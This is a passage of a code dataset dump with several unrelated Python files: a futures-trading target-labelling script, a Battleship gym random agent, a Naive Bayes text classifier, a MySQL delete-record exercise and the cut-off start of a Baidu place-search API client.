332, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_gwas_result", "line_number": 337, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 337, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 337, "usage_type": "call"}, {"api_name": "os.path", "line_number": 337, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_qq", "line_number": 339, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 339, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 340, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 340, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 340, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 341, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 341, "usage_type": "attribute"}, {"api_name": "genehunter.core.GeneAnnotationDbExtractor.GeneAnnotationDbExtractor", "line_number": 345, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 346, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 346, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 357, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 386, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 390, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 397, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 425, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 432, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 462, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 464, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 464, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 473, "usage_type": "call"}, {"api_name": "os.path", "line_number": 473, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 476, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 480, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 480, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 481, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 482, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 483, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 484, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 485, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 486, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 487, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 489, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 490, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 491, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 493, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 496, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 497, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 500, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 500, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 501, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 501, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 502, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 502, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 503, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 503, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 504, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 504, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 505, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 505, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 506, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 506, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 507, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 507, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 508, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 508, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 509, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 509, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 510, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 510, "usage_type": "attribute"}, {"api_name": "{'stats': 'scipy.stats'}", "line_number": 517, "usage_type": "call"}, {"api_name": "{'stats': 'scipy.stats'}", "line_number": 531, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 536, "usage_type": "call"}, {"api_name": "os.path", "line_number": 536, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path", "line_number": 537, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 539, "usage_type": "call"}, {"api_name": "os.path", "line_number": 539, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 541, "usage_type": "call"}, {"api_name": "os.path", "line_number": 541, "usage_type": "attribute"}]} +{"seq_id": "531873472", "text": "import pandas as pd\nimport numpy as np\nimport datetime\nfrom pandas.tseries.holiday import USFederalHolidayCalendar as calendar\nimport configparser\nimport warnings\nimport feather\nimport time\nfrom multiprocessing import Pool, Process\nimport ast\nimport dask.dataframe as dd\nimport gc\nimport re\n\nimport sys\n\nstart_time = time.time()\n\n\nconfig = configparser.ConfigParser()\nconfig.read('/home/melgazar9/Trading/TD/Scripts/Trading-Scripts/Multi-Product/scripts/CL/CL_Create_Target.ini')\n\nstrong_buy_actual = float(config['PARAMS']['strong_buy_actual'])\nmed_buy_actual = float(config['PARAMS']['med_buy_actual'])\nno_trade_actual = float(config['PARAMS']['no_trade_actual'])\nmed_sell_actual = float(config['PARAMS']['med_sell_actual'])\nstrong_sell_actual = float(config['PARAMS']['strong_sell_actual'])\nstop_actual = float(config['PARAMS']['stop_actual'])\n\nstrong_buy_HL = float(config['PARAMS']['strong_buy_HL'])\nmed_buy_HL = float(config['PARAMS']['med_buy_HL'])\nno_trade_HL = float(config['PARAMS']['no_trade_HL'])\nmed_sell_HL = float(config['PARAMS']['med_sell_HL'])\nstrong_sell_HL = float(config['PARAMS']['strong_sell_HL'])\nstop_HL = float(config['PARAMS']['stop_HL'])\n\nstrong_cap_actual = float(config['PARAMS']['strong_cap_actual'])\nmed_cap_actual = float(config['PARAMS']['med_cap_actual'])\nstrong_cap_HL = float(config['PARAMS']['strong_cap_HL'])\nmed_cap_HL = float(config['PARAMS']['med_cap_actual'])\n\nthreshold = float(config['PARAMS']['threshold'])\n\nActual_Move = config['PARAMS']['Actual_Move']\nActual_HighMove = config['PARAMS']['Actual_HighMove']\nActual_LowMove = config['PARAMS']['Actual_LowMove']\n\n\n\nif config['PATH']['df_path'].endswith('.feather'):\n df = pd.read_feather(config['PATH']['df_path'])\nelif config['PATH']['df_path'].endswith('.feather'):\n df = dd.read_parquet(config['PATH']['df_path'], low_memory=False).compute()\nelif config['PATH']['df_path'].endswith('.csv'):\n df = pd.read_csv(config['PATH']['df_path'], low_memory=False)\n\n\ndf.set_index('Datetime', inplace=True)\ndf.sort_index(inplace=True)\n\nresample_period = list(re.findall('\\d+', Actual_Move))[0] + 'min'\ndf_tmp = df.resample(resample_period)\ntmp_actualMove = df_tmp[Actual_Move.replace('Actual', 'Prev')].shift(-1)\ntmp_actualMove.name = Actual_Move\ntmp_actualHighMove = df_tmp[Actual_HighMove.replace('Actual', 'Prev')].shift(-1)\ntmp_actualHighMove.name = Actual_HighMove\ntmp_actualLowMove = df_tmp[Actual_LowMove.replace('Actual', 'Prev')].shift(-1)\ntmp_actualLowMove.name = Actual_LowMove\ntmp = pd.merge_asof(tmp_actualMove, tmp_actualHighMove, left_index = True, right_index = True)\ntmp = pd.merge_asof(tmp, tmp_actualLowMove, left_index = True, right_index = True)\ndf = pd.merge_asof(df, tmp, left_index = True, right_index = True)\ndel df_tmp, resample_period, tmp_actualMove, tmp_actualHighMove, tmp_actualLowMove, tmp\n\nprint(df.head())\nprint(df.shape)\n\nclass CalcTarget():\n\n def __init__(self, df, strong_buy, med_buy, no_trade, med_sell, strong_sell, threshold, stop):\n\n self.df = df\n self.strong_buy = strong_buy\n self.med_buy = med_buy\n self.no_trade = no_trade\n self.med_sell = med_sell\n self.strong_sell = strong_sell\n self.threshold = threshold # to prevent data errors\n self.stop = stop\n\n def calc_target_actual(self):\n\n super().__init__()\n\n# self.df[Actual_Move] = self.df['Prev' + Actual_Move.strip('Actual')].shift(-1)\n\n # strong buy\n self.df.loc[(self.df[Actual_Move] >= self.strong_buy) & (self.df[Actual_Move] <= self.threshold) & (self.df[Actual_LowMove] > (-1)*self.stop), 'Target_Actual'] = 4\n\n # medium buy\n self.df.loc[(self.df[Actual_Move] >= self.med_buy) & (self.df[Actual_Move] <= self.strong_buy) & (self.df[Actual_LowMove] > (-1)*self.stop) & (self.df['Target_Actual'] != 4), 'Target_Actual'] = 3\n\n # medium sell\n self.df.loc[(self.df[Actual_Move] <= (-1) * self.med_sell) & (self.df[Actual_Move] >= (-1) * self.strong_sell) & (self.df[Actual_LowMove] < self.stop) & (self.df['Target_Actual'] != 4) & (self.df['Target_Actual'] != 3), 'Target_Actual'] = 1\n\n # strong sell\n self.df.loc[(self.df[Actual_Move] <= (-1) * self.strong_sell) & (self.df[Actual_Move] >= (-1) * self.threshold) & (self.df[Actual_LowMove] < self.stop) & (self.df['Target_Actual'] != 4) & (self.df['Target_Actual'] != 3) & (self.df['Target_Actual'] != 1), 'Target_Actual'] = 0\n\n self.df.loc[(self.df['Target_Actual'] != 0) & (self.df['Target_Actual'] != 1) & (self.df['Target_Actual'] != 3) & (self.df['Target_Actual'] != 4), 'Target_Actual'] = 2\n\n# return pd.DataFrame(lst, index=self.df.index).rename(columns={0:'Target_Actual'})\n# return pd.DataFrame(lst, index=self.df[[Actual_Move]].dropna().index).rename(columns={0:'Target_Actual'})\n return df\n\n\n def calc_target_HL(self):\n\n # stop means how much heat I am willing to take per trade\n # i.e. if the move went up in my favor $50 but I took $1000 worth of heat that isn't good\n # hm stands for high move, lm stands for low move\n\n# if np.isnan(self.df[Actual_LowMove]) or np.isnan(self.df[Actual_HighMove])\n\n # if ActualHM >= buy signal AND ActualLM doesn't go below stop\n # Strong Buy\n self.df.loc[(self.df[Actual_HighMove] >= self.strong_buy) & (self.df[Actual_LowMove] >= (-1)*self.stop), 'Target_HL'] = 4\n\n # Strong Sell\n self.df.loc[(self.df[Actual_LowMove] <= (-1)*self.strong_sell) & (self.df[Actual_HighMove] <= self.stop) & (self.df['Target_HL'] != 4), 'Target_HL'] = 0\n\n # Medium Buy\n self.df.loc[(self.df[Actual_HighMove] >= self.med_buy) & (self.df[Actual_LowMove] >= (-1)*self.stop) & (self.df['Target_HL'] != 4) & (self.df['Target_HL'] != 0), 'Target_HL'] = 3\n\n # Medium Sell\n self.df.loc[(self.df[Actual_LowMove] <= (-1)*self.med_sell) & (self.df[Actual_HighMove] <= self.stop) & (self.df['Target_HL'] != 4) & (self.df['Target_HL'] != 0) & (self.df['Target_HL'] != 3), 'Target_HL'] = 1\n\n self.df.loc[(self.df['Target_HL'] != 0) & (self.df['Target_HL'] != 1) & (self.df['Target_HL'] != 3) & (self.df['Target_HL'] != 4), 'Target_HL'] = 2\n# return pd.DataFrame(lst, index=self.df.resample('60min').first().index).rename(columns={0:'Target_HL'})\n# return pd.DataFrame(lst, index=self.df[[Actual_Move]].dropna().index).rename(columns={0:'Target_HL'})\n return df\n\nif config['PARAMS']['create_target_Actual_ON'] == 'TRUE':\n\n df_target_actual = CalcTarget(df, strong_buy=strong_buy_actual, med_buy=med_buy_actual, no_trade=no_trade_actual,\n med_sell=med_sell_actual, strong_sell=strong_sell_actual, threshold=threshold,\n stop=stop_actual).calc_target_actual()\n for i in range(int(config['PARAMS']['min_target_lookback']), int(config['PARAMS']['max_target_lookback']), int(config['PARAMS']['target_lookback_increment'])):\n df_target_actual['PrevTarget_ActMove' + str(i)] = df_target_actual['Target_Actual'].shift(i)\n\n df = df_target_actual.fillna(2).astype('int')\n\n print(df['Target_Actual'].value_counts())\n\nif config['PARAMS']['create_target_HL_ON'] == 'TRUE':\n\n df_target_HL = CalcTarget(df, strong_buy=strong_buy_HL, med_buy=med_buy_HL, no_trade=no_trade_HL,\n med_sell=med_sell_HL, strong_sell=strong_sell_HL, threshold=threshold,\n stop=stop_HL).calc_target_HL()\n\n\n print(df_target_HL['Target_HL'].value_counts())\n\n for i in range(int(config['PARAMS']['min_target_lookback']), int(config['PARAMS']['max_target_lookback']), int(config['PARAMS']['target_lookback_increment'])):\n df_target_HL['PrevTarget_HL' + str(i)] = df_target_HL['Target_HL'].shift(i)\n\n df = df_target_HL.fillna(2).astype('int')\n\n print(df['Target_HL'].value_counts())\n", "sub_path": "Trading/scripts/Live-Trading/Create_Target.py", "file_name": "Create_Target.py", "file_ext": "py", "file_size_in_byte": 7842, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_feather", "line_number": 51, "usage_type": "call"}, {"api_name": "dask.dataframe.read_parquet", "line_number": 53, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 55, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.merge_asof", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.merge_asof", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.merge_asof", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "36199712", "text": "import gym\nimport coding_challenge\nimport numpy as np\n\nenv = gym.make('Battleship-v0')\nstate = env.reset()\nterminal = False\nwhile not terminal:\n action = np.random.rand(2)\n state, reward, terminal, info = env.step(action)\n print(info['game_message'])\n", "sub_path": "random_agent/random_agent.py", "file_name": "random_agent.py", "file_ext": "py", "file_size_in_byte": 260, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "gym.make", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "7218190", "text": "import os\nimport numpy as np\nfrom collections import defaultdict\nimport pandas as pd\nimport random\n\nos.chdir('C://Users/wanyu/Documents/Computational Linguilistics/PA2/github')\n\n\nclass NaiveBayes():\n\n def __init__(self, train_df, test_df):\n \n self.train_df = train_df\n self.test_df = test_df\n self.train_data = {}\n self.class_dict = {}\n self.feature_dict = {}\n self.V = {}\n self.V_unique = []\n self.class_count = []\n self.word_count = []\n self.feature_ratio = None\n self.prior = None\n self.likelihood = None\n self.label_col = None\n self.text_col = None\n \n \n \n def preprocess_text(self, text):\n \"\"\"\n Transform text data into a series of token words\n \"\"\"\n # Remove new lines and concatenate each line into a string \n text = ''.join(text.splitlines())\n # Transform a document into a series of token words\n text = text.split(' ')\n # Remove noncharacters\n text = [i for i in text if i.isalpha()]\n \n return text\n\n\n\n def get_train_data(self, label_col, text_col, class_dict=None):\n \n \"\"\"\n Stores all documents and words as class instances\n Compute the number of documents in each class,\n And the number of words in each document simultaneously\n \"\"\"\n \n self.label_col = label_col\n self.text_col = text_col\n \n self.class_dict = class_dict\n \n if class_dict == None:\n self.class_dict = {c_index: word \n for c_index, word \n in enumerate(self.train_df[self.label_col].unique())}\n \n \n for c_index, c_name in self.class_dict.items():\n document_list = []\n word_list = []\n \n for document in self.train_df.loc[self.train_df[self.label_col] == c_name, self.text_col]:\n document = self.preprocess_text(document)\n document_list.append(document)\n word_list.extend(document)\n \n self.train_data[c_index] = document_list \n self.V[c_index] = word_list \n # Compute the number of documents in each class\n self.class_count.append(len(document_list))\n # Compute the number of words in each class\n self.word_count.append(len(word_list))\n \n self.class_count = np.matrix(self.class_count).reshape(len(self.class_dict),1)\n self.word_count = np.matrix(self.word_count).reshape(len(self.class_dict),1) \n \n \n \n def potential_features(self, freq=0.0002, num_f=50):\n \"\"\"\n Selects some potential features that might be useful to classify\n based on the likelihood ratio:\n LR(w) = max (P(w|c1) / P(w|c2), P(w|c2) / P(w|c1)) \n \"\"\"\n \n # Calculate a frequency for each word and each class\n for key, value in self.V.items():\n self.V[key] = pd.Series(value).value_counts()\n \n # Combine two Series based on word indices\n df = pd.DataFrame(self.V).fillna(1)\n word_index = np.array(df.index)\n mat = np.matrix(df)\n \n # Calculate conditional probabilites for each word\n mat = np.divide(mat, mat.sum(axis=0))\n \n # Choose words with higher frequencies and stores their position\n # We can set a frequency rate in the function. The default is 0.0002.\n h_freq = np.where(np.sum(mat > freq, axis=1) != 0)[0]\n \n # Compute the likelihodd ratio\n \n ratio_name = []\n \n LR = np.zeros((mat.shape[0],1))\n for i in range(mat.shape[1]):\n for j in range(mat.shape[1]):\n if i == j: continue\n LR = np.c_[LR, mat[:,i]/mat[:,j]]\n name = self.class_dict[i] + '_' + self.class_dict[j]\n ratio_name.append(name)\n \n # Choose words based on the values of LR\n # We can set the number of candidates in our function.\n # The default is 50.\n \n top_LR_index = LR[h_freq].max(axis=1).argsort(axis=0)[:-(num_f+1):-1]\n candidate = word_index[h_freq][top_LR_index].reshape(1,num_f).tolist()\n\n column_name = list(self.class_dict.values()) + ratio_name \n self.feature_ratio = pd.DataFrame(np.c_[mat,LR[:, 1:]], \n columns = column_name,\n index = word_index)\n \n return candidate[0]\n \n\n def get_key(self, my_dict, val): \n \"\"\"\n Get the key by value in dictionary.\n \"\"\"\n for key, value in my_dict.items(): \n if val == value: \n return key \n\n\n def get_feature_dict(self, feature_list):\n \n feature_dict = { i: feature_list[i] \n for i in range(len(feature_list))} \n \n return feature_dict\n\n\n def train(self, feature_list):\n \"\"\"\n Trains a multinomial Naive Bayes classifier on a training set.\n Specifically, fills in self.prior and self.likelihood such that:\n self.prior[class] = log(P(class))\n self.likelihood[class][feature] = log(P(feature|class))\n \"\"\"\n # Define the features dictionary to train\n self.feature_dict = self.get_feature_dict(feature_list)\n \n # Compute the number of features in each document\n features_count = np.ones((len(self.class_dict), \n len(self.feature_dict)))\n \n\n for class_idx, class_docs in self.train_data.items():\n for document in class_docs:\n for word in document:\n if word in self.feature_dict.values():\n feature_index = self.get_key(self.feature_dict, word)\n features_count[class_idx][feature_index] += 1\n\n # Get unique words in all documents\n if self.V_unique == []:\n for w_df in self.V.values():\n word_list = list(w_df.index)\n self.V_unique.extend(word_list)\n #print(type(w_list))\n self.V_unique = list(set(self.V_unique))\n \n\n # normalize counts to probabilities, and take logs\n self.prior = np.log(self.class_count/np.sum(self.class_count))\n self.likelihood = np.log(np.divide(features_count, self.word_count+len(self.V_unique)))\n\n\n def test(self, data=0):\n \"\"\"\n Tests the classifier on a development or test set.\n Returns a dictionary of filenames mapped to their correct \n and predicted classes such that:\n results[fileID]['correct'] = correct class\n results[fileID]['predicted'] = predicted class\n \"\"\"\n \n results = defaultdict(dict)\n \n if data == 0:\n data = self.test_df\n \n\n for c_index, c_name in self.class_dict.items():\n \n for document in data.loc[data[self.label_col] == c_name, self.text_col]:\n document = self.preprocess_text(document)\n feature_count = np.zeros((len(self.feature_dict), 1))\n \n for word in document:\n if word in self.feature_dict.values():\n feature_index = list(self.feature_dict.values()).index(word)\n feature_count[feature_index] += 1\n \n class_prob = self.prior + self.likelihood.dot(feature_count)\n class_pred = int(class_prob.argmax(axis=0))\n results[len(results)]= {'correct': c_index,\n 'predicted': class_pred}\n \n return results\n\n\n def confusion_matrix(self, results):\n \"\"\"\n Compute a confusion matrix based on results produced from test()\n \"\"\"\n confusion_matrix = np.zeros((len(self.class_dict),\n len(self.class_dict)))\n \n for doc in results.values():\n confusion_matrix[doc['correct'], doc['predicted']] +=1\n \n return confusion_matrix \n \n \n def evaluate(self, results):\n \"\"\"\n Given results, calculates the following metrics:\n Precision, Recall, F1 for each class, and overall Accuracy\n Return an evaluation metrics in a DataFrame format.\n \"\"\"\n \n confusion_matrix = self.confusion_matrix(results)\n \n indicator = pd.Series(['Class', 'Accuracy', 'Precision', \n 'Recall', 'F1'])\n \n performance = []\n \n for i in range(2):\n class_name = self.class_dict[i]\n accuracy = round(np.sum(confusion_matrix.diagonal()) / np.sum(confusion_matrix), 3)\n precision = round(confusion_matrix[i,i] / np.sum(confusion_matrix[:,i]), 3)\n recall = round(confusion_matrix[i,i] / np.sum(confusion_matrix[i]), 3)\n f1_score = round((2*precision*recall) / (precision+recall), 3)\n performance.append([class_name, accuracy, precision, recall, f1_score])\n \n performance = pd.DataFrame(np.array(performance), columns=indicator).set_index('Class')\n\n return performance\n\n\n\n\n def select_features(self, feature_list, method = 'forward', \n random_select = True, max_features = 10, \n min_features = 10, metric = 'Accuracy', \n class_index = 0, show_process = False, \n print_mode = True):\n \n \"\"\"\n Performs a process of feature selection\n Returns a set of features and evaluation with the best performance\n \n Here, there are two methods used for selecting features:\n - Forward Method: \n Begins with an empty model and adds in one feature at each step.\n If the performance is better, then keep it. Otherwise, drop it.\n \n - Backward Method:\n Begins with all the features selected and removes one feature \n at each step. If the performance is better, then keep it. \n Otherwise, drop it.\n \n \"\"\"\n # Initialize \n final_features = []\n best_metric = 0\n best_evaluation = None\n \n # Shuffle features and make them have a random order\n if random_select:\n random_indices = random.sample(range(len(feature_list)-1), \n len(feature_list)-1)\n feature_list = [feature_list[i] for i in random_indices]\n \n # Forward Method\n if method == 'forward':\n for feature in feature_list:\n # Add one feature at each step\n final_features.append(feature)\n # Training model and compute some performance metrics \n self.train(final_features)\n results = self.test()\n evaluation = self.evaluate(results) \n \n # Set a metric to evaluate performance\n metric_v = float(evaluation.loc[self.class_dict[class_index], metric])\n \n # Determine if we should drop the feature based on the metric\n if metric_v > best_metric:\n best_metric = metric_v\n best_evaluation = evaluation\n \n else:\n final_features.remove(feature)\n \n # Show the selection process and print results at each round\n # The default is True\n if show_process == True:\n print(best_metric)\n print(final_features)\n \n # If the number of features achieve the maximum number,\n # then the selection process will stop\n # The default is at most 10 features\n if len(final_features) == max_features:\n break\n \n # Backward Method\n elif method == 'backward':\n \n # Begin with all the features selected\n final_features = feature_list\n \n # Remove one feature at each step\n for i in range(len(feature_list)): \n if i != 0:\n # Select the first one feature as a test word \n test_word = final_features[0]\n # Remove the test word\n final_features.remove(test_word)\n \n # Training model and compute some performance metrics \n self.train(final_features)\n results = self.test()\n evaluation = self.evaluate(results) \n \n # Determine if we should drop the feature \n # based on the metric we define in the function\n metric_v = float(evaluation.loc[self.class_dict[class_index], metric])\n \n \n if metric_v >= best_metric:\n best_metric = metric_v\n best_evaluation = evaluation\n \n else:\n final_features.append(test_word)\n \n # Determine if we need to print results at each round\n # The default is True \n if show_process == True:\n print(best_metric)\n print(final_features)\n \n # If the number of features achieve the minimum number,\n # then the selection process will stop\n # The default is at least 10 features\n if len(final_features) == min_features:\n break\n \n # Save the best model through training again\n self.train(final_features)\n results = self.test()\n evaluation = self.evaluate(results) \n\n \n # Decide whether the program print results or not. \n # The default is True\n if print_mode:\n print('------- The Number of Final Features -------\\n')\n print(str(len(final_features)) + '\\n')\n print('------- Features with the Best Performance -------\\n')\n print(', '.join(final_features) + '\\n')\n print('------- The Best Performance of the Model -------\\n')\n print(best_evaluation) \n \n \n return final_features, best_evaluation\n \n\n\n", "sub_path": "nlp/sentiment analysis/Naive Bayes Algorithm/NaiveBayesDF.py", "file_name": "NaiveBayesDF.py", "file_ext": "py", "file_size_in_byte": 14647, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.chdir", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 186, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 293, "usage_type": "call"}]} +{"seq_id": "648642600", "text": "# Implementar la funcion borrar_persona, que elimina un registro en la tabla Persona.\n# Devuelve un booleano en base a si encontro el registro y lo borro o no.\n\nimport datetime\n\nfrom ejercicio_01 import reset_tabla, mysql, mydb, mycursor\nfrom ejercicio_02 import agregar_persona\n\n\ndef borrar_persona(id_persona):\n try:\n mycursor = mydb.cursor()\n mycursor.execute(f\"DELETE FROM `persona` WHERE `persona`.`IdPersona` = {id_persona}\")\n mydb.commit()\n query_result = mycursor.fetchone()\n if(mycursor.rowcount > 0):\n return True\n return False\n except mysql.connector.Error as error:\n print(f\"Error al eliminar a la persona con id {id_persona}: {error}\")\n return False\n finally:\n if (mydb.is_connected()):\n mycursor.close()\n pass\n\n\n@reset_tabla\ndef pruebas():\n assert borrar_persona(agregar_persona('juan perez', datetime.datetime(1988, 5, 15), 32165498, 180))\n assert borrar_persona(12345) is False\n\nif __name__ == '__main__':\n pruebas()\n", "sub_path": "practico_03/ejercicio_03.py", "file_name": "ejercicio_03.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "ejercicio_01.mycursor", "line_number": 12, "usage_type": "name"}, {"api_name": "ejercicio_01.mydb.cursor", "line_number": 12, "usage_type": "call"}, {"api_name": "ejercicio_01.mydb", "line_number": 12, "usage_type": "name"}, {"api_name": "ejercicio_01.mycursor.execute", "line_number": 13, "usage_type": "call"}, {"api_name": "ejercicio_01.mycursor", "line_number": 13, "usage_type": "name"}, {"api_name": "ejercicio_01.mydb.commit", "line_number": 14, "usage_type": "call"}, {"api_name": "ejercicio_01.mydb", "line_number": 14, "usage_type": "name"}, {"api_name": "ejercicio_01.mycursor.fetchone", "line_number": 15, "usage_type": "call"}, {"api_name": "ejercicio_01.mycursor", "line_number": 15, "usage_type": "name"}, {"api_name": "ejercicio_01.mycursor.rowcount", "line_number": 16, "usage_type": "attribute"}, {"api_name": "ejercicio_01.mycursor", "line_number": 16, "usage_type": "name"}, {"api_name": "ejercicio_01.mysql.connector", "line_number": 19, "usage_type": "attribute"}, {"api_name": "ejercicio_01.mysql", "line_number": 19, "usage_type": "name"}, {"api_name": "ejercicio_01.mydb.is_connected", "line_number": 23, "usage_type": "call"}, {"api_name": "ejercicio_01.mydb", "line_number": 23, "usage_type": "name"}, {"api_name": "ejercicio_01.mycursor.close", "line_number": 24, "usage_type": "call"}, {"api_name": "ejercicio_01.mycursor", "line_number": 24, "usage_type": "name"}, {"api_name": "ejercicio_02.agregar_persona", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "ejercicio_01.reset_tabla", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "638424962", "text": "# -*- coding: utf-8 -*-\n__author__ = 'zhangjinjie'\n\nimport requests\nimport json\nimport logging\n\n\nclass PlaceApi(object):\n u\"\"\"\n search poi data by keyword.\n \"\"\"\n search_url = 'http://api.map.baidu.com/place/v2/search'\n detail_url = 'http://api.map.baidu.com/place/v2/detail'\n eventsearch_url = 'http://api.map.baidu.com/place/v2/eventsearch'\n eventdetail_url = 'http://api.map.baidu.com/place/v2/eventdetail'\n\n def __init__(self, scheduler):\n self.scheduler = scheduler\n\n def get_place_by_page(self, query, region, **kwargs):\n u\"\"\"\n 城市内检索\n\n 百度在没有查找到对应查询请求时, 会返回在其它城市查找到的结果, 返回格式为[{'num': , 'name': ''} 